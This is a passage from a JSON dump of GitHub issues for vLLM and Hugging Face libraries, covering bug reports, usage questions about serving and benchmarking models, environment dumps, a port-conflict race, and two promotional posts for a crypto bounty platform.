Right now I am using a modified Python version of the BPE tokenizer made by the genius [Yikai-Liao](https://github.com/Yikai-Liao/efficient_bpe/blob/main/ebpe_v2.py), however it would be nice to see that happening in Rust as well, and natively supported by huggingface. Unfortunately, I am still novice in working with Rust, otherwise I would make a pull request with the suggested changes. Is it something that can be worked out in the future? Or is there a way to do this with the current implementation? Thank you!", "url": "https://github.com/huggingface/tokenizers/issues/1885", "state": "open", "labels": [], "created_at": "2025-11-13T10:40:29Z", "updated_at": "2025-11-28T07:51:07Z", "comments": 1, "user": "VasLem" }, { "repo": "vllm-project/vllm", "number": 28629, "title": "[Usage]: TPOT per request information was not collected by vllm bench serve", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+xpu\nIs debug build : False\nCUDA used to build PyTorch : None\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.14.0-1006-intel-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : False\nCUDA runtime version : No CUDA\nCUDA_MODULE_LOADING set to : N/A\nGPU models and configuration : No CUDA\nNvidia driver version : No CUDA\ncuDNN version : No CUDA\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: Intel(R) Xeon(R) w5-3435X\nBIOS Model name: Intel(R) Xeon(R) w5-3435X CPU @ 3.1GHz\nBIOS CPU family: 179\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 16\nSocket(s): 1\nStepping: 8\nCPU(s) scaling MHz: 45%\nCPU max MHz: 4700.0000\nCPU min MHz: 800.0000\nBogoMIPS: 6192.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni 
avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 768 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 32 MiB (16 instances)\nL3 cache: 45 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-31\nVulnerability Gather data sampling: Not affected\nVulnerability Ghostwrite: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and ", "url": "https://github.com/vllm-project/vllm/issues/28629", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-13T09:20:19Z", "updated_at": "2025-11-13T09:20:19Z", "comments": 0, "user": "jlwang1996" }, { "repo": "vllm-project/vllm", "number": 28626, "title": "[Bug]:Qwen3-VL-32B-AWQ model memory usage: 8k context limit with 40GB VRAM?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nRunning models on the latest stable vLLM release: https://huggingface.co/QuantTrio/Qwen3-VL-32B-Instruct-AWQ\nThe model size is 20GB, and my GPU has 40GB VRAM total.\nUsing parameter: --gpu-memory-utilization 0.9\nWhy am I only getting around 8k max context length? Do VL models really hog that much VRAM?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28626", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-13T08:00:20Z", "updated_at": "2025-11-17T07:08:47Z", "comments": 3, "user": "maxin9966" }, { "repo": "vllm-project/vllm", "number": 28622, "title": "[Bug]: Can we able to benchmark Quantized MOE models Either W8A8 or W8A16 ?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.18 (main, Jun 4 2025, 08:56:00) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.14.0-33-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.0.140\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA RTX 6000 Ada Generation\nNvidia driver version : 575.57.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.11.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.11.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 52\nOn-line CPU(s) list: 0-51\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) w7-2595X\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 26\nSocket(s): 1\nStepping: 8\nCPU(s) scaling MHz: 21%\nCPU max MHz: 4800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5616.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 1.2 MiB (26 instances)\nL1i cache: 832 KiB (26 instances)\nL2 cache: 52 MiB (26 instances)\nL3 cache: 48.8 
MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-51\nVulnerability Gather data sampling: Not affected\nVulnerability Ghostwrite: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not af", "url": "https://github.com/vllm-project/vllm/issues/28622", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-13T07:26:56Z", "updated_at": "2025-11-13T07:27:06Z", "comments": 0, "user": "logesh13" }, { "repo": "vllm-project/vllm", "number": 28610, "title": "[Usage]: Does 0.11.0 support tree attention with eagle?", "body": "### Your current environment\n\nDoes 0.11.0 support tree attention with eagle? Do I need to enable it manually?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28610", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-13T03:35:02Z", "updated_at": "2025-12-03T17:08:16Z", "comments": 1, "user": "wincle" }, { "repo": "huggingface/datasets", "number": 7864, "title": "add_column and add_item erroneously(?) require new_fingerprint parameter", "body": "### Describe the bug\n\nContradicting their documentation (which doesn't mention the parameter at all), both Dataset.add_column and Dataset.add_item require a new_fingerprint string. This parameter is passed directly to the dataset constructor, which has the fingerprint parameter listed as optional; is there any reason it shouldn't be optional in these methods as well? \n\n### Steps to reproduce the bug\n\nReproduction steps:\n\n1. Look at the function signature for add_column: https://github.com/huggingface/datasets/blob/17f40a318a1f8c7d33c2a4dd17934f81d14a7f57/src/datasets/arrow_dataset.py#L6078\n2. Repeat for add_item: https://github.com/huggingface/datasets/blob/17f40a318a1f8c7d33c2a4dd17934f81d14a7f57/src/datasets/arrow_dataset.py#L6336\n\n### Expected behavior\n\nadd_column and add_item should either set the fingerprint parameter to optional or include it in their docstrings\n\n### Environment info\n\nNot environment-dependent", "url": "https://github.com/huggingface/datasets/issues/7864", "state": "open", "labels": [], "created_at": "2025-11-13T02:56:49Z", "updated_at": "2025-12-07T14:41:40Z", "comments": 2, "user": "echthesia" }, { "repo": "vllm-project/vllm", "number": 28566, "title": "[Usage]: pd disagg scenario: I discovered the decoder also performs the prefill operation, is it normal?", "body": "When num_computed_tokens is less than num_prompt_tokens, it will enter the prefill operation\n\n\"Image\"\n\n\nAnd I found that num_computed_tokens can be less than num_prompt_tokens, because num_prompt_tokens is len(block_ids) * self.block_size; even when num_computed_tokens is exactly equal to num_prompt_tokens, it does num_computed_tokens -= 1. Why? This causes num_computed_tokens to never equal num_prompt_tokens\n\n\"Image\"\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here).
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28566", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-12T16:18:53Z", "updated_at": "2025-11-12T16:18:53Z", "comments": 0, "user": "yangshanjun" }, { "repo": "vllm-project/vllm", "number": 28564, "title": "[Usage]: Can't get ModernBert models to run in vllm serve", "body": "### Your current environment\n\nI am trying to download and use ModernBertModel with the vllm serve feature. \nAt first I thought it was an issue with the model so I switched from trying to use BertEmbed with Alibaba-NLP/gte-modernbert-base since it appears in the docs as a model that supports embedding. \nSource: https://docs.vllm.ai/en/latest/models/supported_models/#pooling-models \n\nI download and run it like this. \nDownload:\n`huggingface-cli download Alibaba-NLP/gte-modernbert-base --local-dir models/bert --local-dir-use-symlinks False`\nServe (example, I have used many iterations):\n`vllm serve models/bert2 --host 0.0.0.0 --port 8003 --task embed --trust-remote-code --gpu-memory-utilization 0.3`\n\nNo matter what I get this: Assertion failed, The model should be a generative or pooling model when task is set to 'embedding'. [type=assertion_error, input_value=ArgsKwargs((), {'model': ...rocessor_plugin': None}), input_type=ArgsKwargs]\n\nI tried setting runner but that didn't do a thing. I really have no clue why it says this model is supported in the docs. I have searched through other issues and documentation to try out a bunch of solutions but obviously none have worked so far. Been trying to figure this out for hours now and I am losing my mind (not relevant ig, need to vent).\n\n### How would you like to use vllm\n\nI want to run inference of a Alibaba-NLP/gte-modernbert-base or any ModernBertModel. I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28564", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-12T15:51:18Z", "updated_at": "2025-11-12T15:51:18Z", "comments": 0, "user": "Logikschleifen" }, { "repo": "vllm-project/vllm", "number": 28527, "title": "\ud83d\udca1 Bounty Platform for vLLM", "body": "Hi vLLM team! \ud83d\udc4b\n\nI wanted to share **Roxonn** - a decentralized bounty platform for accelerating AI/ML development.\n\n**What is Roxonn?**\n\u2705 Fund GitHub issues with crypto bounties (XDC, USDC, ROXN)\n\u2705 Notify 300+ AI/ML developers\n\u2705 Auto-pay when PRs merge via blockchain\n\u2705 Zero crypto setup needed\n\n**Quick flow:**\n1. Register repo (GitHub App)\n2. Fund pool with USDC (stable pricing)\n3. Assign bounties to features\n4. 
PR merged \u2192 automatic payment\n\n**Perfect for AI/ML:**\n- Access to research community\n- **Only 1% total platform fee**\n- Transparent payments\n\nLearn more: **https://roxonn.com**\n\n*No pressure - sharing a resource!*", "url": "https://github.com/vllm-project/vllm/issues/28527", "state": "closed", "labels": [], "created_at": "2025-11-12T07:50:33Z", "updated_at": "2025-11-13T12:36:15Z", "comments": 0, "user": "dineshroxonn" }, { "repo": "huggingface/transformers", "number": 42154, "title": "\ud83d\udca1 Bounty Platform for Hugging Face Transformers", "body": "Hi Hugging Face Transformers team! \ud83d\udc4b\n\nI wanted to share **Roxonn** - a decentralized bounty platform for accelerating AI/ML development.\n\n**What is Roxonn?**\n\u2705 Fund GitHub issues with crypto bounties (XDC, USDC, ROXN)\n\u2705 Notify 300+ AI/ML developers\n\u2705 Auto-pay when PRs merge via blockchain\n\u2705 Zero crypto setup needed\n\n**Quick flow:**\n1. Register repo (GitHub App)\n2. Fund pool with USDC (stable pricing)\n3. Assign bounties to features\n4. PR merged \u2192 automatic payment\n\n**Perfect for AI/ML:**\n- Access to research community\n- **Only 1% total platform fee**\n- Transparent payments\n\nLearn more: **https://roxonn.com**\n\n*No pressure - sharing a resource!*", "url": "https://github.com/huggingface/transformers/issues/42154", "state": "closed", "labels": [], "created_at": "2025-11-12T07:49:59Z", "updated_at": "2025-11-17T11:40:10Z", "comments": 2, "user": "dineshroxonn" }, { "repo": "vllm-project/vllm", "number": 28508, "title": "[Usage]: KVCacheManager Parameter question", "body": "\n\nI noticed that the parameter \u201cself.req_to_block_hashes\u201d has been removed from KVCacheManager since version v0.10.0. But this parameter is still preserved in the official documentation. Could you please provide an explanation of this change? \n\n- [Document Description](https://docs.vllm.ai/en/v0.9.2/api/vllm/v1/core/kv_cache_manager.html)\n\n- [Version v0.10.0 code](https://github.com/vllm-project/vllm/blob/v0.10.0/vllm/v1/core/kv_cache_manager.py)\n\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28508", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-12T03:10:18Z", "updated_at": "2025-11-16T08:33:45Z", "comments": 1, "user": "Liziqi-77" }, { "repo": "huggingface/diffusers", "number": 12638, "title": "How to design a network with DiT blocks that is friendly to TensorRT fp16 conversion?", "body": "We had a network structured as `a convnet pre-encoder -> DiT blocks -> final block for last sampling`. It worked well in torch format and onnx format, but when we tried to convert it into tensorrt fp16 format, the inference gets value overflow. We have seen the data difference (between onnx and trt fp16, with polygraphy) get larger and larger following those DiT blocks. My question is: how do we make the whole model design more friendly to mixed-precision inference, i.e., make the DiT blocks less sensitive to value precision? Should I make the convnet pre-encoder and final blocks more complex, or simpler?
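\n\nA possible mitigation, sketched below under stated assumptions (the `keyword` used to match DiT-block layer names is a placeholder for this network, and OBEY_PRECISION_CONSTRAINTS requires a reasonably recent TensorRT): build the engine in FP16 overall, but pin the numerically sensitive layers inside the DiT blocks back to FP32:\n\n```python\nimport tensorrt as trt\n\ndef pin_layers_to_fp32(network: trt.INetworkDefinition, keyword: str = \"blocks\") -> None:\n    \"\"\"Force every layer whose name contains `keyword` to compute in FP32.\"\"\"\n    for i in range(network.num_layers):\n        layer = network.get_layer(i)\n        if keyword in layer.name and layer.type not in (trt.LayerType.CONSTANT, trt.LayerType.SHAPE):\n            layer.precision = trt.float32\n            for j in range(layer.num_outputs):\n                layer.set_output_type(j, trt.float32)\n\n# During engine build:\n#   config.set_flag(trt.BuilderFlag.FP16)\n#   config.set_flag(trt.BuilderFlag.OBEY_PRECISION_CONSTRAINTS)\n#   pin_layers_to_fp32(network, keyword=\"blocks\")\n```\n\nStarting from softmax/normalization layers and widening the FP32 set until the polygraphy divergence disappears is one reasonable search strategy.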
Thanks", "url": "https://github.com/huggingface/diffusers/issues/12638", "state": "open", "labels": [], "created_at": "2025-11-12T02:23:37Z", "updated_at": "2025-11-12T02:23:37Z", "user": "JohnHerry" }, { "repo": "huggingface/lerobot", "number": 2428, "title": "how to eval a real-world recorded dataset?", "body": "Can lerobot eval a real-world dataset with a metric such as MSE? I checked the eval script and found that currently it can only eval sim-env datasets.", "url": "https://github.com/huggingface/lerobot/issues/2428", "state": "open", "labels": [ "question", "evaluation" ], "created_at": "2025-11-12T02:08:44Z", "updated_at": "2025-11-19T16:55:42Z", "user": "shs822" }, { "repo": "vllm-project/vllm", "number": 28505, "title": "[Feature]: Is there a plan to introduce the new feature nano-pearl, a new engineering effort in speculative reasoning?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nNano-pearl can support speculative inference with higher concurrency (larger batch sizes) and is seamlessly compatible with algorithms like Eagle. Is there a plan to introduce it?\nGitHub: https://github.com/smart-lty/nano-PEARL\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28505", "state": "open", "labels": [ "feature request" ], "created_at": "2025-11-12T01:34:22Z", "updated_at": "2025-11-17T06:14:09Z", "comments": 1, "user": "Lexlum" }, { "repo": "vllm-project/vllm", "number": 28498, "title": "[Bug][RL]: Port Conflict", "body": "### Your current environment\n\n- bug report:\n\n```\nHello vLLM team, I'm running into a suspicious ZMQ socket bug with my 2P 4D configuration for DeepSeek-V3 (see below). I thought it is caused by reusing same nodes for many vLLM launches, but now it happened also at a clean node. Seems like a DP bug of sorts. Please find logs attached.
vllm==0.11.0.\n```\n\n```bash\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/async_llm.py\", line 134, in __init__\n[1;36m(APIServer pid=670293)[0;0m self.engine_core = EngineCoreClient.make_async_mp_client(\n[1;36m(APIServer pid=670293)[0;0m ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 101, in make_async_mp_client\n[1;36m(APIServer pid=670293)[0;0m return DPLBAsyncMPClient(*client_args)\n[1;36m(APIServer pid=670293)[0;0m ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 1125, in __init__\n[1;36m(APIServer pid=670293)[0;0m super().__init__(vllm_config, executor_class, log_stats,\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 975, in __init__\n[1;36m(APIServer pid=670293)[0;0m super().__init__(vllm_config, executor_class, log_stats,\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 769, in __init__\n[1;36m(APIServer pid=670293)[0;0m super().__init__(\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 466, in __init__\n[1;36m(APIServer pid=670293)[0;0m self.resources.output_socket = make_zmq_socket(\n[1;36m(APIServer pid=670293)[0;0m ^^^^^^^^^^^^^^^^\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/vllm/utils/__init__.py\", line 2983, in make_zmq_socket\n[1;36m(APIServer pid=670293)[0;0m socket.bind(path)\n[1;36m(APIServer pid=670293)[0;0m File \"XXX/.venv/lib/python3.12/site-packages/zmq/sugar/socket.py\", line 320, in bind\n[1;36m(APIServer pid=670293)[0;0m super().bind(addr)\n[1;36m(APIServer pid=670293)[0;0m File \"zmq/backend/cython/_zmq.py\", line 1009, in zmq.backend.cython._zmq.Socket.bind\n[1;36m(APIServer pid=670293)[0;0m File \"zmq/backend/cython/_zmq.py\", line 190, in zmq.backend.cython._zmq._check_rc\n[1;36m(APIServer pid=670293)[0;0m zmq.error.ZMQError: Address already in use (addr='tcp://slurm-h200-206-017:59251')\n```\n\n### \ud83d\udc1b Describe the bug\n\nFrom Nick:\n```\nI think the problem is that each DP worker finds/assigns free ports dynamically/independently.. so there is a race condition. I'm not sure of an immediate workaround apart from just re-attempting to start things when this happens. We'll have to look at how to catch and re-find a port if possible (though I have a memory this might be nontrivial).\n```\n\nFrom Reporter:\n```\nReceived init message: EngineHandshakeMetadata(addresses=EngineZmqAddresses(inputs=['tcp://slurm-h200-207-083:60613'], outputs=['tcp://slurm-h200-207-083:36865'], coordinator_input='tcp://slurm-h200-207-083:34575', coordinator_output='tcp://slurm-h200-207-083:48025', frontend_stats_publish_address='ipc:///tmp/88ec875f-3de9-46ec-9947-6d1d6573b910'), parallel_config={'data_parallel_master_ip': 'slurm-h200-207-083', 'data_parallel_master_port': 41917, '_data_parallel_master_port_list': [60545, 36835, 47971, 37001], 'data_parallel_size': 32})\n```\n\nI'm looking at the code and I see that all code paths for getting ports eventually go to _get_open_port, and that in _get_open_port there is basically no defence against choosing the same port twice.
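To make the suspected race concrete, here is a generic sketch of the "find a free port" pattern (not vLLM's actual implementation): the port is only reserved while the probe socket is bound, so anything that starts between the probe's close() and the real bind() can take the same port. The second helper shows the hold-the-port variant the reporter suggests below.

```python
import socket

def get_open_port_racy() -> int:
    # Probe: bind to port 0, read the kernel's choice, then close.
    # The port is free again the moment this returns, so a concurrent
    # caller (or another process such as Ray) can grab the same number.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("", 0))
        return s.getsockname()[1]

def get_held_port() -> tuple[socket.socket, int]:
    # Safer variant: return the still-bound socket along with the port,
    # so the reservation is never dropped before the consumer takes over.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("", 0))
    return s, s.getsockname()[1]
```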
Can you please confirm my understanding?\n\n_get_open_port in main is here: https://github.com/vllm-project/vllm/blob/main/vllm/utils/network_utils.py#L177\n\nUPD: I imagine the assumption here is that once a code path gets a port, that code path will use it immediately, and thus the port will become busy. It doesn't seem to hold though.\n\n\nEven when all the sockets vLLM chose for itself are unique, I get the stack trace below.\nI have the following explanation in mind:\n\n- vLLM chooses zmq ports before launching the engines\n- launching the engines takes ~5 mins\n- by the time the engines are launched, something can listen on this port, like for example Ray\n- **It looks like the right solution is to hold on to the chosen ports immediately as they are chosen.**\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28498", "state": "open", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-11-11T22:51:35Z", "updated_at": "2025-12-04T07:35:31Z", "comments": 13, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 28489, "title": "[Usage]: Online continuous batching", "body": "### Current environment\n\n```\n==============================\n System Info\n==============================\nOS : macOS 26.1 (arm64)\nGCC version : Could not collect\nClang version : 17.0.0 (clang-1700.4.4.1)\nCMake version : Could not collect\nLibc version : N/A\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0\nIs debug build : False\nCUDA used to build PyTorch : None\nROCM used to build PyTorch : N/A\n==============================\n Python Environment\n==============================\nPython version : 3.12.6 (v3.12.6:a4a2d2b0d85, Sep 6 2024, 16:08:03) [Clang 13.0.0 (clang-1300.0.29.30)] (64-bit runtime)\nPython platform : macOS-26.1-arm64-arm-64bit\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : False\nCUDA runtime version : No CUDA\nCUDA_MODULE_LOADING set to : N/A\nGPU models and configuration : No CUDA\nNvidia driver version : No CUDA\ncuDNN version : No CUDA\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n==============================\n CPU Info\n==============================\nApple M2\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.6\n[pip3] nvidia-ml-py==13.580.82\n[pip3] pyzmq==27.0.0\n[pip3] sentence-transformers==5.1.2\n[pip3] spacy-transformers==1.3.9\n[pip3] torch==2.8.0\n[pip3] torchaudio==2.8.0\n[pip3] torchvision==0.23.0\n[pip3] transformers==4.57.1\n[conda] Could not collect\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.0\nvLLM Build Flags:\n CUDA Archs: Not Set; ROCm: Disabled\nGPU Topology:\n Could not collect\n==============================\n Environment Variables\n==============================\nPYTORCH_NVML_BASED_CUDA_CHECK=1\nTORCHINDUCTOR_COMPILE_THREADS=1\n\n```\n\nHello,\n\nI am looking to run an LLM (using vLLM) within a FastAPI application.
My goal is to achieve online, continuous batching.\n\nI want the application to continuously receive requests from external clients, and have vLLM automatically batch them up for parallel inference.\n\nIn the past, I used the LLM() engine wrapped in RayServe. While this worked, it seemed to create a new internal deployment each time, which I want to avoid.\n\nI am now trying to achieve this without RayServe, using the AsyncLLMEngine directly (I don't know if I need the async engine; I read about it online).\n\nHere is an example of my current code. I'm running on a CPU for test purposes, but I have another issue on GPU (very long inference times, like minutes; with Ray, only 2-3 seconds).\n\n```\n# Model:\nengine_args = AsyncEngineArgs(\n model=path,\n tensor_parallel_size=1,\n gpu_memory_utilization=0.7,\n enforce_eager=False,\n disable_custom_all_reduce=False,\n max_model_len=2048,\n trust_remote_code=True,\n enable_log_requests=False,\n max_num_seqs=10\n )\n\nmodel_ = AsyncLLMEngine.from_engine_args(engine_args)\n\n# Params\nsampling_params = SamplingParams(\n n=1,\n best_of=None,\n presence_penalty=0.0,\n frequency_penalty=0.0,\n temperature=0,\n top_p=1.0,\n top_k=1,\n stop=my_stop_token,\n stop_token_ids=[my_eos_token_id],\n ignore_eos=False,\n max_tokens=2048,\n logprobs=None,\n skip_special_tokens=True\n )\n\noutputs_generator = model_.generate(prompt, sampling_params, request_id)\n\nfinal_output = None\nasync for request_output in outputs_generator:\n if request_output.finished:\n final_output = request_output\n break\n\nif final_output and final_output.outputs:\n result = final_output.outputs[0].text\n```\n\nIn my local test, I got the error below when I tried, for example, 3 inferences: calling 